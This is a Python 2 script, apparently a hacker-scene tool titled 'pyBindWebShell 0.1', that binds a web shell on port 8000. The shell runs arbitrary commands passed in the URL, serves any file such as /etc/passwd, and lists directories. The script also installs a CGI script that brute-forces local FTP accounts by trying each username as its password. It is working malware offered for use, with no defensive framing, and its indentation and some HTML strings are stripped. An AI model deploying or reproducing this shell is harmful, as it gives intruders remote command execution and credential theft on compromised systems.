#!/usr/bin/env python
#-----------------------------------------------+
# ._____________________. |
# Coded by slav0nic | slav0nic0@gmail.com | |
# ^---------------------^ |
# Site: slav0nic.xss.ru |
#-----------------------------------------------+
#script bind cgi server on 8000 port and get u web-shell + simple http serv
#
#use: python sl_wb_sh.py [port]
#get file or dir listing: site/?dir/etc/passwd
#cgi dir is created in "homedir"
#"bugz": 1 bug - my enlish ;)
#popen function wait while procces terminate..and only after that serv sends answer=> not good:)
#ps: not use ping and etc command
#big files (>500mb)files are long opened (file=open(..).read() ;))
#threads are not used
#############################
#idea=good
#realization=sux :)
########_CONFIG_#############
PORT = 8000
__version__="pyBindWebShell 0.1"
homedir=None #exmpl. homedir="/tmp"
#######_CONFIG_END_#########
import os
import sys
import glob
import mimetypes
from urllib import *
import CGIHTTPServer
import BaseHTTPServer
if len(sys.argv)>1:
PORT=int(sys.argv[1])
def dir_to_lnk(directory):
directory.sort()
href_dirs=""
size="0"
for i in directory:
if os.path.isfile(i):
k=i.split("/")[-1:][0] #for file
else:
k=i.split("/")[-1:] #for dir
if not i.startswith("//"):i="/"+i
try:
size=str(os.path.getsize(i)/1024)
except:
size=sys.exc_value
href_dirs+='
%s %s Kb
'%(i,k,size)
return href_dirs
index="""
[bind-web_shell 0.1]
Server_Info: %s
|
Bind_web_shell: |
MENU: |:FTP_Brut:| :"Dir. /":
%s
|
"""
#cgi as exmpl.
ftp_brut=r"""#!/usr/bin/env python
import cgitb; cgitb.enable()
from ftplib import FTP
import sys
import time
import pwd
step=50
users=[]
ok_users=[]
j,i=0,0
for user in pwd.getpwall():
users.append(user[0])
ftp= FTP()
print "Content-Type: text/html\n"
print ''
print "[+]FtpBrut: Users loaded = " ,len(users)
start_time=time.time()
for i in range(len(users)):
if not(i % step) and i!=0:
j+=step
print "[!]bruted %i passwords (%i pass/sec)"%(j,int(j/(time.time()-start_time)))
try:
ftp.connect('localhost') # connect to host, default port
except:
print 'FtpBrut: connection error';break
try:
if(ftp.login(user=users[i],passwd=users[i])):
print "\t[+] l=", users[i],"p=", users[i]
ok_users.append(users[i])
except :
pass
ftp.close()
print "\tCracked", len(ok_users),"users"
print 'Good Logins: %s from %i'%(ok_users,len(users))
"""
serv_info=os.popen("whoami;uptime").read()+str(os.uname()).replace("', '"," ")[1:-1]
try:
if homedir:
os.chdir(homedir)
os.mkdir("cgi")
print "[+]CGI dir created"
except:
print sys.exc_value
try:
f_br=open("cgi/ftp_br.py","w")
f_br.write(ftp_brut)
f_br.close()
map(lambda x: os.chmod(x,0700),glob.glob("cgi/*"))
except:
print sys.exc_value
class Handler(CGIHTTPServer.CGIHTTPRequestHandler):
cgi_directories = ["/cgi"]
server_version=__version__
def do_GET(s):
cmd="[slav0nic]"
pars_dir=""
show_form=1
new_dir=""
result=""
if s.is_cgi():
try:
os.chdir(homedir)
except:
pass
s.run_cgi()
else:
if s.path <> '/':
if s.path[2:5]=='cmd':
parse=unquote(s.path[6:].replace('+',' '))
trash,cmd=os.popen4(parse)
result=cmd.read()
for command in parse.replace("~",os.environ['HOME']).split(";") :
if "cd " in command:
new_dir=command.split()[-1:]
if new_dir:
try: os.chdir(new_dir[0])
except:
result+="[-]ChangeDir_Error: "+str(sys.exc_value)
elif s.path[2:5]=='dir':
show_form=0
pars_dir=unquote(s.path[5:])
if os.path.isdir(pars_dir):
content=glob.glob(pars_dir+"/*")
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(dir_to_lnk(content))
else:
try:
file=open(pars_dir,"rb").read()
s.send_response(200)
s.send_header("Content-type", mimetypes.guess_type(pars_dir)[0])
s.send_header("Content-length", os.path.getsize(pars_dir))
s.end_headers()
s.wfile.write(file)
except:
s.send_error(404,sys.exc_value)
if show_form:
s.wfile.write(index %(serv_info,PORT,result))
s.wfile.write("")
do_POST=do_GET
httpd = BaseHTTPServer.HTTPServer(("", PORT), Handler)
print "[+]Server started.\nPort", PORT
httpd.serve_forever()